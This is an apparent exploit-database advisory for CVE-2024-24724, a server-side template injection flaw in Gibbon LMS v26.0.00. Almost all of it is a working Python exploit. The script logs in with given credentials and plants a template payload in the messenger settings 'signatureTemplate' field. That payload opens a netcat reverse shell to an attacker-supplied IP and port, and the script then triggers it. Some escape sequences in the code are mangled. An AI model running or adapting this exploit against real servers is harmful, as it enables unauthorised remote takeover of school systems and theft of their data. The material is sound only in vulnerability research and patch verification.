Gibbon version 26.0.00 suffers from a server-side template injection vulnerability that allows for remote code execution.
advisories | CVE-2024-24724
# Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version
# Date: 21.01.2024
# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24724
import requests
import re
import sys
def login(target_host, target_port,email,password):
url = f'http://{target_host}:{target_port}/login.php?timeout=true'
headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}
data = f"-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="address"rnrnrn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="method"rnrndefaultrn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="username"rnrn{email}rn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="password"rnrn{password}rn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="gibbonSchoolYearID"rnrn025rn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="gibboni18nID"rnrn0002rn-----------------------------174475955731268836341556039466--rn"
r = requests.post(url, headers=headers, data=data, allow_redirects=False)
Session_Cookie = re.split(r"s+", r.headers['Set-Cookie'])
if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):
print("login successful!")
return Session_Cookie[4]
def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}
data = f"-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="address"rnrn/modules/School Admin/messengerSettings.phprn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="enableHomeScreenWidget"rnrnYrn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="signatureTemplate"rnrn{{{{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}rn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="messageBcc"rnrnrn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="pinnedMessagesOnHome"rnrnNrn-----------------------------67142646631840027692410521651--rn"
r = requests.post(url, headers=headers, data=data, allow_redirects=False)
if 'success0' in str(r.headers['Location']):
print("Payload uploaded successfully!")
def trigger(cookie, target_host, target_port):
url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
headers = {"Cookie": cookie}
print("RCE successful!")
r = requests.get(url, headers=headers, allow_redirects=False)
if __name__ == '__main__':
if len(sys.argv) != 7:
print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")
sys.exit(1)
cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
trigger(cookie, sys.argv[1], sys.argv[2])